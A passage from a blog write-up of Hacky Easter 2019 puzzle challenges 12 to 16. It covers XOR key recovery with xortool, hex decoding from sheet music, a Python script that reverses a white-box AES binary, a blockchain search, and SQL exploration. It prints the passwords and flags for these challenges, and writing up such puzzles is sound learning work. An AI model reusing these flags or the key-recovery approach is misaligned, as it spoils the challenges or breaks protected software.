var int local_44h @ rbp-0x44\n|           ; var int local_40h @ rbp-0x40\n|           ; var int local_3ch @ rbp-0x3c\n|           ; var int local_38h @ rbp-0x38\n|           ; var int local_34h @ rbp-0x34\n|           ; var int local_30h @ rbp-0x30\n|           ; var int local_28h @ rbp-0x28\n|           ; var int local_20h @ rbp-0x20\n|           ; var int local_14h @ rbp-0x14\n|           ; var int local_10h @ rbp-0x10\n|           ; var signed int local_8h @ rbp-0x8\n|           ; var int local_4h @ rbp-0x4\n|           ; CALL XREF from sym.main (0x400872)\n|           0x00400657      55             push rbp\n|           0x00400658      4889e5         mov rbp, rsp\n|           0x0040065b      4883ec60       sub rsp, 0x60               ; &#039;`&#039;\n|           0x0040065f      48897da8       mov qword &#x5B;local_58h], rdi\n|           0x00400663      bf4d030000     mov edi, 0x34d              ; 845\n|           0x00400668      e8f3feffff     call sym.imp.malloc\n|           0x0040066d      488945f0       mov qword &#x5B;local_10h], rax\n|           0x00400671      488b45a8       mov rax, qword &#x5B;local_58h]\n|           0x00400675      4889c7         mov rdi, rax\n|           0x00400678      e8d3feffff     call sym.imp.strlen\n|           0x0040067d      83e801         sub eax, 1\n|           0x00400680      8945ec         mov dword &#x5B;local_14h], eax\n|           0x00400683      488b45f0       mov rax, qword &#x5B;local_10h]\n|           0x00400687      488945e0       mov qword &#x5B;local_20h], rax\n|           0x0040068b      488b45a8       mov rax, qword &#x5B;local_58h]\n|           0x0040068f      488945d8       mov qword &#x5B;local_28h], rax\n|           0x00400693      48c745d06010.  mov qword &#x5B;local_30h], obj.data ; 0x601060 ; &quot;0U\\x1e3\\x18\\x1dTb&lt;\\x01Z\\t\\x16\\x19D\\x01\\x7f\\x0e^\\x01H9\\x01A&quot;\n|           0x0040069b      c745fc000000.  mov dword &#x5B;local_4h], 0\n...\n<\/pre><\/div>\n<br\/>After trying different inputs and inspected the output of the program, I assumed that this might be a simple XOR. In order to further analyze the encrypted data with <a href=\"https:\/\/github.com\/hellman\/xortool\" target=\"_new\" rel=\"noopener noreferrer\">xortool<\/a>, we have to extract it first.\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [5]; title: ; notranslate\" title=\"\">\n&#x5B;0x00400580]&gt; is~data\n054 ---------- 0x006013ad GLOBAL NOTYPE    0 _edata\n055 0x00001040 0x00601040   WEAK NOTYPE    0 data_start\n067 0x00001040 0x00601040 GLOBAL NOTYPE    0 __data_start\n073 0x00001060 0x00601060 GLOBAL    OBJ  845 data\n\n<\/pre><\/div>\n<br\/>The encrypted data is stored at <code>0x00001060<\/code> within the file and is seized <code>845<\/code> byte. Knowing this we can simply use <code>dd<\/code> to extract it:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# dd if=decryptor bs=1 skip=$(rax2 0x1060) count=845 of=buff\n845+0 records in\n845+0 records out\n845 bytes copied, 0.0261717 s, 32.3 kB\/s\n\n<\/pre><\/div>\n<br\/>Now we can run <code>xortool<\/code> on the encrypted data:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [7]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# xortool buff\nThe most probable key lengths:\n   1:   10.1%\n   4:   10.6%\n   7:   9.5%\n  10:   9.3%\n  13:   22.9%\n  20:   6.3%\n  26:   12.6%\n  30:   4.4%\n  39:   9.0%\n  52:   5.3%\nKey-length can be 3*n\nKey-length can be 5*n\nMost possible char is needed to guess the key!\n<\/pre><\/div>\n<br\/>The most probable key length is <code>13<\/code>. So let&#8217;s run a bruteforce on printable solution (<code>-o<\/code>) with this key length (<code>-l 13<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# xortool -l 13 -o buff\n200 possible key(s) of length 13:\n! b\\x0eg!dxO~$~;\n! b\\x0eg!dxO~$~t\n !c\\x0ff eyN\\x7f%\\x7f:\n !c\\x0ff eyN\\x7f%\\x7fu\n#&quot;`\\x0ce#fzM|&amp;|9\n...\nFound 55 plaintexts with 95.0%+ valid characters\nSee files filename-key.csv, filename-char_used-perc_valid.csv\n<\/pre><\/div>\n<br\/>The results are stored in <code>.\/xortool_out\/<\/code>. The output should contain the string <code>he19-<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# grep &#039;he19-&#039; xortool_out\/*\nBinary file xortool_out\/188.out matches\nBinary file xortool_out\/189.out matches\n<\/pre><\/div>\n<br\/>There are two outputs, which contain this string. The file <code>.\/xortool_out\/filename-key.csv<\/code> contains the information, which keys were used to produce this output:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# cat xortool_out\/filename-key.csv | grep &#039;188\\|189&#039;\nxortool_out\/188.out;10r\\x1ew1th_n4n+\nxortool_out\/189.out;10r\\x1ew1th_n4nd\n<\/pre><\/div>\n<br\/>The second one looks almost reasonable. Though, there is one non ASCII character (<code>\\x1e<\/code>). Because it is right in front of the word <code>w1th<\/code>, it is probably an underscore, which would make the key:\n<br\/>\n<br\/><code>10r_w1th_n4nd<\/code>\n<br\/>\n<br\/>If we now simply replace the first letter (<code>1<\/code>) with an <code>x<\/code>, the key makes sense:\n<br\/>\n<br\/><code>x0r_w1th_n4nd<\/code>\n<br\/>\n<br\/>Entering this key as the password successfully decrypts the cipher text:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# echo &quot;x0r_w1th_n4nd&quot; | .\/decryptor\nEnter Password: Hello,\ncongrats you found the hidden flag: he19-Ehvs-yuyJ-3dyS-bN8U.\n\n&#039;The XOR operator is extremely common as a component in more complex ciphers. By itself, using a constant repeating key, a simple XOR cipher can trivially be broken using frequency analysis. If the content of any message can be guessed or otherwise known then the key can be revealed.&#039;\n(https:\/\/en.wikipedia.org\/wiki\/XOR_cipher)\n\n&#039;An XOR gate circuit can be made from four NAND gates. In fact, both NAND and NOR gates are so-called &quot;universal gates&quot; and any logical function can be constructed from either NAND logic or NOR logic alone. If the four NAND gates are replaced by NOR gates, this results in an XNOR gate, which can be converted to an XOR gate by inverting the output or one of the inputs (e.g. with a fifth NOR gate).&#039;\n(https:\/\/en.wikipedia.org\/wiki\/XOR_gate)\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-Ehvs-yuyJ-3dyS-bN8U<\/span>.\n<br\/>\n<h1 id=\"chlg13\">13 &#8211; Symphony in HEX<\/h1>\nThe challenge provides the following sheet of music as well as the hint <i>count quavers, read semibreves<\/i>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg13_01.png\" width=\"800\"\/>\n<br\/>\n<br\/>The hint was very useful. We simply have to count the notes within a quaver and read the semibreves:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg13_03.png\" width=\"800\"\/>\n<br\/>\n<br\/>This results in the hex stream <code>4841434b5f4d455f414d4144455553<\/code>, which can be converted to the following ASCII characters:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg13# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n&#x5B;GCC 8.3.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; hexstream = &#039;4841434b5f4d455f414d4144455553&#039;\n&gt;&gt;&gt; hexstream.decode(&#039;hex&#039;)\n&#039;HACK_ME_AMADEUS&#039;\n<\/pre><\/div>\n<br\/>\n<br\/>Entering <code>HACK_ME_AMADEUS<\/code> as the password in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg13_02.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-7fEm-jj7g-gpt3-4Mdh<\/span>.\n<br\/>\n<h1 id=\"chlg14\">14 &#8211; White Box<\/h1>\nThe challenge provides the following cipher text:\n<br\/>\n<br\/><code>9771a6a9aea773a93edc1b9e82b745030b770f8f992d0e45d7404f1d6533f9df348dbccd71034aff88afd188007df4a5c844969584b5ffd6ed2eb92aa419914e<\/code>\n<br\/>\n<br\/>&#8230; as well as a binary, which was used to produce the cipher text:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# file WhiteBox\nWhiteBox: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID&#x5B;sha1]=0077413b3a5ad4d245339f092e46d64e547155f0, stripped\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# .\/WhiteBox\nWhiteBox Test\nEnter Message to encrypt: test\n691157323aae599f38afe55d7282a068\n<\/pre><\/div>\n<br\/>Being euphoric that this is a binary challenge I did not pay much attention to the name of it and started to reverse the binary right away. While reversing it, I figured out that this is a <a href=\"http:\/\/www.whiteboxcrypto.com\/\" target=\"_new\" rel=\"noopener noreferrer\">white-box cryptography<\/a> challenge and there are several good resources online about unboxing white-boxes (e.g. <a href=\"https:\/\/www.blackhat.com\/docs\/eu-15\/materials\/eu-15-Sanfelix-Unboxing-The-White-Box-Practical-Attacks-Against-Obfuscated-Ciphers-wp.pdf\" target=\"_new\" rel=\"noopener noreferrer\">blackhat.com<\/a>,  <a href=\"https:\/\/www.youtube.com\/watch?v=84Pp9CBjgd8\" target=\"_new\" rel=\"noopener noreferrer\">LiveOverflow on YouTube<\/a>, &#8230;). There is also a GitHub repository providing <i>various public white-box cryptographic implementations and their practical attacks<\/i>: <a href=\"https:\/\/github.com\/SideChannelMarvels\/Deadpool\" target=\"_new\" rel=\"noopener noreferrer\">SideChannelMarvels\/Deadpool<\/a>.\n<br\/>\n<br\/>Nevertheless I kept analyzing the binary and was confident, that it is possible to reverse the single steps made in order to encrypt the entered plain text.\n<br\/>\n<br\/>For this purpose I mainly used <code>ghidra<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg14_01.png\" width=\"1200\"\/>\n<br\/>\n<br\/>Actually all steps but one could be reverted easily. This single remaining step XORed a value called <code>result<\/code> with values from static data four times in a loop (I named the function <code>encrStack<\/code>, but this was only my personal way to differentiate the functions):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg14_02.png\" width=\"1200\"\/>\n<br\/>\n<br\/>A single byte from the plain text (at this stage) is used as an index into the static data and thus determines which value from the static data is used. So basically the following operation is carried out:\n<br\/>\n<br\/><code>ciphertext_val = static_data[plaintext_byte0] ^ static_data[plaintext_byte1] ^ static_data[plaintext_byte2] ^ static_data[plaintext_byte3]<\/code>\n<br\/>\n<br\/>When reverting this, we know the value of <code>ciphertext_val<\/code>. Since we have access to the whole binary, we also know the values of the <code>static_data<\/code>. In order to deduce <code>plaintext_byte0<\/code> &#8230; <code>plaintext_byte3<\/code>, we can loop through all possible values for the four bytes and compare the XORed result. My first apprehension was that there might be more possible combination to produce a valid result, but it turned out, that there only seems to be a unique valid combination (possibly this is an inherent property of these values of an AES white-box, but I did not dig deeper into this topic).\n<br\/>\n<br\/>After all I wrote the following python script, which decrypts 16 byte at a time:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nimport sys\nimport struct\n\nbinary = open(&#039;WhiteBox&#039;, &#039;r&#039;).read()\n\ndef decrShuffleNewOrig(r):\n  ret = &#x5B;None]*16\n  for i in range(4):\n    for j in range(4):\n      ret&#x5B;i*4+j] = r&#x5B;i+j*4]\n  return &#039;&#039;.join(ret)\n\ndef decrChooseFromDAT(r):\n  ret = &#039;&#039;\n  for i in range(16):\n    findByte = r&#x5B;i]\n    for j in range(0x100):\n      if (binary&#x5B;0x2060+i*0x100+j] == findByte):\n        ret += chr(j)\n        break\n  return ret\n\ndef decrShuffleBlocks(r):\n  ret = &#x5B;None]*16\n  ret&#x5B;0xf] = r&#x5B;0xc]; ret&#x5B;0xe] = r&#x5B;0xf]\n  ret&#x5B;0xd] = r&#x5B;0xe]; ret&#x5B;0xc] = r&#x5B;0xd]; ret&#x5B;0xb] = r&#x5B;9]; ret&#x5B;0xa] = r&#x5B;8]\n  ret&#x5B;9] = r&#x5B;0xb]; ret&#x5B;8] = r&#x5B;10]; ret&#x5B;7] = r&#x5B;6]; ret&#x5B;6] = r&#x5B;5]; ret&#x5B;5] = r&#x5B;4]\n  ret&#x5B;4] = r&#x5B;7]; ret&#x5B;3] = r&#x5B;3]; ret&#x5B;2] = r&#x5B;2]; ret&#x5B;1] = r&#x5B;1]; ret&#x5B;0] = r&#x5B;0]\n  return &#039;&#039;.join(ret)\n\ndef findXorValues(x,i,v):\n  # eg. 0x19a08d51 = 0xdb273160 ^ 0x9e2d7eaf ^ 0xf7c0787 ^ 0x53d6c519\n  vals1 = &#x5B;];  vals2 = &#x5B;]; vals3 = &#x5B;]; vals4 = &#x5B;]\n  for v1 in range(256): vals1.append(struct.unpack(&#039;&lt;I&#039;, binary&#x5B;0x3060+(v1+(i+(x*4+0)*4)*0x100)*4:0x3060+(v1+(i+(x*4+0)*4)*0x100)*4+4])&#x5B;0])\n  for v2 in range(256): vals2.append(struct.unpack(&#039;&lt;I&#039;, binary&#x5B;0x3060+(v2+(i+(x*4+1)*4)*0x100)*4:0x3060+(v2+(i+(x*4+1)*4)*0x100)*4+4])&#x5B;0])\n  for v3 in range(256): vals3.append(struct.unpack(&#039;&lt;I&#039;, binary&#x5B;0x3060+(v3+(i+(x*4+2)*4)*0x100)*4:0x3060+(v3+(i+(x*4+2)*4)*0x100)*4+4])&#x5B;0])\n  for v4 in range(256): vals4.append(struct.unpack(&#039;&lt;I&#039;, binary&#x5B;0x3060+(v4+(i+(x*4+3)*4)*0x100)*4:0x3060+(v4+(i+(x*4+3)*4)*0x100)*4+4])&#x5B;0])\n\n  for v1 in range(len(vals1)):\n    for v2 in range(len(vals2)):\n      for v3 in range(len(vals3)):\n        for v4 in range(len(vals4)):\n          if (vals1&#x5B;v1]^vals2&#x5B;v2]^vals3&#x5B;v3]^vals4&#x5B;v4] == v):\n            return chr(v1)+chr(v2)+chr(v3)+chr(v4)\n  raise Exception(&#039;did not find solution&#039;)\n\n\ndef decrStack(x,r):\n  v1 = findXorValues(x,0,struct.unpack(&#039;&lt;I&#039;, r&#x5B;0]+r&#x5B;4]+r&#x5B;8]+r&#x5B;0xc])&#x5B;0])\n  v2 = findXorValues(x,1,struct.unpack(&#039;&lt;I&#039;, r&#x5B;1]+r&#x5B;5]+r&#x5B;9]+r&#x5B;0xd])&#x5B;0])\n  v3 = findXorValues(x,2,struct.unpack(&#039;&lt;I&#039;, r&#x5B;2]+r&#x5B;6]+r&#x5B;0xa]+r&#x5B;0xe])&#x5B;0])\n  v4 = findXorValues(x,3,struct.unpack(&#039;&lt;I&#039;, r&#x5B;3]+r&#x5B;7]+r&#x5B;0xb]+r&#x5B;0xf])&#x5B;0])\n  final = &#039;&#039;\n  for i in range(4): final += v1&#x5B;i]+v2&#x5B;i]+v3&#x5B;i]+v4&#x5B;i]\n  return final\n\n\ndef decrIdxShuffle(r):\n  return r&#x5B;0]+r&#x5B;4]+r&#x5B;8]+r&#x5B;0xc]+r&#x5B;1]+r&#x5B;5]+r&#x5B;9]+r&#x5B;0xd]+r&#x5B;2]+r&#x5B;6]+r&#x5B;0xa]+r&#x5B;0xe]+r&#x5B;3]+r&#x5B;7]+r&#x5B;0xb]+r&#x5B;0xf]\n\ndef decrypt(r):\n  r1 = decrShuffleNewOrig(r)\n  r2 = decrChooseFromDAT(r1)\n  r3 = decrShuffleBlocks(r2)\n  r4 = r3\n  for x in range(8, -1, -1):\n    r4 = decrStack(x,r4)\n    r4 = decrShuffleBlocks(r4)\n  r5 = decrIdxShuffle(r4)\n  return r5\n\nif (len(sys.argv) &lt; 2):\n  print(&#039;usage:&#039;)\n  print(sys.argv&#x5B;0] + &#039; &lt;16 byte cipher text&gt;&#039;)\n  quit()\n\nplaintext = decrypt(sys.argv&#x5B;1].decode(&#039;hex&#039;))\nprint(plaintext)\n<\/pre><\/div>\n<br\/>Running the script on each of the 16 bytes of the provided cipher text, reveals the full plain text (it takes a few minutes for the script to be finished):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# .\/reversedWhitebox.py 9771a6a9aea773a93edc1b9e82b74503\nCongrats! Enter \n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# .\/reversedWhitebox.py 0b770f8f992d0e45d7404f1d6533f9df\nwhiteboxblackhat\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# .\/reversedWhitebox.py 348dbccd71034aff88afd188007df4a5\n into the Egg-o-\n<\/pre><\/div> <div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# .\/reversedWhitebox.py c844969584b5ffd6ed2eb92aa419914e\nMatic!\n<\/pre><\/div>\n<br\/>Accordingly the full plain text is <code>Congrats! Enter whiteboxblackhat into the Egg-o-Matic!<\/code>.\n<br\/>\n<br\/>Entering the password <code>whiteboxblackhat<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg14_03.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-fPHI-HUKJ-u15q-Lvwz<\/span>.\n<br\/>\n<h1 id=\"chlg15\">15 &#8211; Seen in Steem<\/h1>\nThe challenge description states that a secret note about Hacky Easter 2019 has been placed in the <i>Steem<\/i> blockchain.\n<br\/>\n<br\/>We also get the information, that the note was added during Easter 2018.\n<br\/>\n<br\/>This task could simply solved using google. Since the author of the challenge is <code>darkstar<\/code>, I started to googling for <code>darkstar<\/code> and <code>steem<\/code> and found the following profile on <a href=\"https:\/\/steemit.com\/@darkstar-42\" target=\"_new\" rel=\"noopener noreferrer\">steemit.com<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg15_03.png\" width=\"800\"\/>\n<br\/>\n<br\/>Though, I could not find any useful information on this website. Thus I kept googling and found a list of entries on <a href=\"https:\/\/steemd.com\/@darkstar-42?page=5\" target=\"_new\" rel=\"noopener noreferrer\">steemd.com<\/a> related to <code>darkstar-42<\/code>. Since we know that the note was added during Easter 2018, which was the 1th of april, we only need to find the appropriate date:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg15_02.png\" width=\"800\"\/>\n<br\/>\n<br\/>Entering <code>nomoneynobunny<\/code> as the password in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg15_01.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-TlUu-qs4k-uEbS-xRob<\/span>.\n<br\/>\n<h1 id=\"chlg16\">16 &#8211; Every-Thing<\/h1>\nThe challenge provides a zip archive called <code>EverThing.zip<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg16# file EveryThing.zip\nEveryThing.zip: Zip archive data, at least v2.0 to extract\n<\/pre><\/div>\n<br\/>This archive contains a file called <code>EverThing.sql<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg16# unzip EveryThing.zip\nArchive:  EveryThing.zip\n  inflating: EveryThing.sql\n<\/pre><\/div>\n<br\/>In order to view the SQL file, we can load it into a new database created locally:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg16# service mysql start\nroot@kali:~\/Documents\/he19\/egg16# mysql\nWelcome to the MariaDB monitor.  Commands end with ; or \\g.\nYour MariaDB connection id is 38\nServer version: 10.3.12-MariaDB-2 Debian buildd-unstable\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType &#039;help;&#039; or &#039;\\h&#039; for help. Type &#039;\\c&#039; to clear the current input statement.\n\nMariaDB &#x5B;(none)]&gt; CREATE DATABASE EveryThing;\nQuery OK, 1 row affected (0.000 sec)\n\nMariaDB &#x5B;(none)]&gt; USE EveryThing;\nDatabase changed\nMariaDB &#x5B;EveryThing]&gt; SOURCE EveryThing.sql;\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.008 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 8504 rows affected (0.165 sec)\nRecords: 8504  Duplicates: 0  Warnings: 0\n\nQuery OK, 8639 rows affected (0.144 sec)\nRecords: 8639  Duplicates: 0  Warnings: 0\n\nQuery OK, 8608 rows affected (0.123 sec)\nRecords: 8608  Duplicates: 0  Warnings: 0\n...\n<\/pre><\/div>\n<br\/>The file contains only one table called <code>Thing<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SHOW TABLES;\n+----------------------+\n| Tables_in_EveryThing |\n+----------------------+\n| Thing                |\n+----------------------+\n1 row in set (0.000 sec)\n\n<\/pre><\/div>\n<br\/>This table has five columns called <code>id<\/code>, <code>ord<\/code>, <code>type<\/code>, <code>value<\/code> and <code>pid<\/code>.\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; DESCRIBE Thing;\n+-------+---------------+------+-----+---------+-------+\n| Field | Type          | Null | Key | Default | Extra |\n+-------+---------------+------+-----+---------+-------+\n| id    | binary(16)    | NO   | PRI | NULL    |       |\n| ord   | int(11)       | NO   |     | NULL    |       |\n| type  | varchar(255)  | NO   |     | NULL    |       |\n| value | varchar(1024) | YES  |     | NULL    |       |\n| pid   | binary(16)    | YES  | MUL | NULL    |       |\n+-------+---------------+------+-----+---------+-------+\n5 rows in set (0.001 sec)\n\n<\/pre><\/div>\n<br\/>There are 38 different types:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT type FROM Thing GROUP BY type;\n+-----------------------+\n| type                  |\n+-----------------------+\n| address               |\n| address.about         |\n| address.address       |\n| address.age           |\n| address.company       |\n| address.email         |\n| address.eyeColor      |\n| address.favoriteFruit |\n| address.gender        |\n| address.greeting      |\n| address.guid          |\n| address.name          |\n| address.phone         |\n| address.picture       |\n| address.registered    |\n| addressbook           |\n| book                  |\n| book.author           |\n| book.isbn             |\n| book.language         |\n| book.title            |\n| book.url              |\n| book.year             |\n| bookshelf             |\n| galery                |\n| png                   |\n| png.bkgd              |\n| png.chrm              |\n| png.gama              |\n| png.head              |\n| png.idat              |\n| png.iend              |\n| png.ihdr              |\n| png.phys              |\n| png.text              |\n| png.time              |\n| ROOT                  |\n| shelf                 |\n+-----------------------+\n38 rows in set (0.215 sec)\n<\/pre><\/div>\n<br\/>The <code>value<\/code> fields of the different types do not seem to contain any useful information:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT value FROM Thing WHERE type=&#039;address.name&#039; LIMIT 10;\n+--------------------+\n| value              |\n+--------------------+\n| Madge Wood         |\n| Guadalupe Eaton    |\n| England Carson     |\n| Carmen Larsen      |\n| Potts Castro       |\n| Esther Greer       |\n| Hall Newton        |\n| Wilkerson Callahan |\n| Crosby Manning     |\n| Sallie Wilson      |\n+--------------------+\n10 rows in set (0.000 sec)\n\n...\n<\/pre><\/div>\n<br\/>The most promising type seems to be <code>png<\/code>. There are 11 entries with this type:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT value FROM Thing WHERE type=&#039;png&#039;;\n+---------------------------------+\n| value                           |\n+---------------------------------+\n| Very old steam boat             |\n| Fantastic trail, but a dead end |\n| The best dinner ever            |\n| Local market                    |\n| At the beach                    |\n| Me, walking through the wood    |\n| The mountains                   |\n| A strange car                   |\n| Nice sunset                     |\n| My first time on a SUP          |\n| My second time on a SUP         |\n+---------------------------------+\n11 rows in set (0.101 sec)\n<\/pre><\/div>\n<br\/>A <code>png<\/code> entry itself does only seem to be the container for an image. The actual data is stored in the corresponding chunk types like <code>png.bkgd<\/code>, <code>png.chrm<\/code>, &#8230;\n<br\/>\n<br\/>In order to determine which chunk types belong to a png, the field <code>pid<\/code> is used, which references the <code>id<\/code> of the parent element. In this case the <code>pid<\/code> of chunk types contain an <code>id<\/code> of a png entry.\n<br\/>\n<br\/>The <code>id<\/code> is stored in binary and can be displayed using the function <code>HEX<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT HEX(id), value FROM Thing WHERE type=&#039;png&#039;;\n+----------------------------------+---------------------------------+\n| HEX(id)                          | value                           |\n+----------------------------------+---------------------------------+\n| 1BD4209D9C664967AA7944E2ED2FC96C | Very old steam boat             |\n| 35FD7ABC15274E38A513F990D153FC37 | Fantastic trail, but a dead end |\n| 42097903161D41839D5D189B93E580D7 | The best dinner ever            |\n| 4651124A8B2F4CDFB7B3CBCA94BB7AF2 | Local market                    |\n| 55431A5914314EEF97CF9C31E07A95F4 | At the beach                    |\n| 58A8E910ED9C4FB3B8083FDFBCE99628 | Me, walking through the wood    |\n| 5BFE2BB8621B46119C7A281960904174 | The mountains                   |\n| 80DCB19D74354660AFDADD761B3DF72E | A strange car                   |\n| D39D3AD6FA85453196E46CD30FCD5612 | Nice sunset                     |\n| F91FD59C966641B2BB05F2374C6C8199 | My first time on a SUP          |\n| FC7ED04E5E464D3DBF210ED60561AE60 | My second time on a SUP         |\n+----------------------------------+---------------------------------+\n11 rows in set (0.000 sec)\n<\/pre><\/div>\n<br\/>In order to display all child chunks for the image called <code>Very old steam boat<\/code>, we can use the <code>id<\/code> (<code>1BD4209D9C664967AA7944E2ED2FC96C<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT HEX(id), ord, type, value FROM Thing WHERE HEX(pid)=&#039;1BD4209D9C664967AA7944E2ED2FC96C&#039; ORDER BY ord;\n+----------------------------------+-----+----------+--------------------------------------+\n| HEX(id)                          | ord | type     | value                                |\n+----------------------------------+-----+----------+--------------------------------------+\n| 0E30644AB47D4E51BA2C47CBD5F02691 |   0 | png.head | iVBORw0KGgo=                         |\n| BABEFABC2E4F406ABC991762A077FED7 |   1 | png.ihdr | AAAADUlIRFIAAAHgAAAB4AgGAAAAfdS+lQ== |\n| A4F0850D832B417C906D6F595C3765E8 |   2 | png.bkgd | AAAABmJLR0QA\/wD\/AP+gvaeT             |\n| 0069956AF2EE42DEBE60E93670CFC5CB |   3 | png.phys | 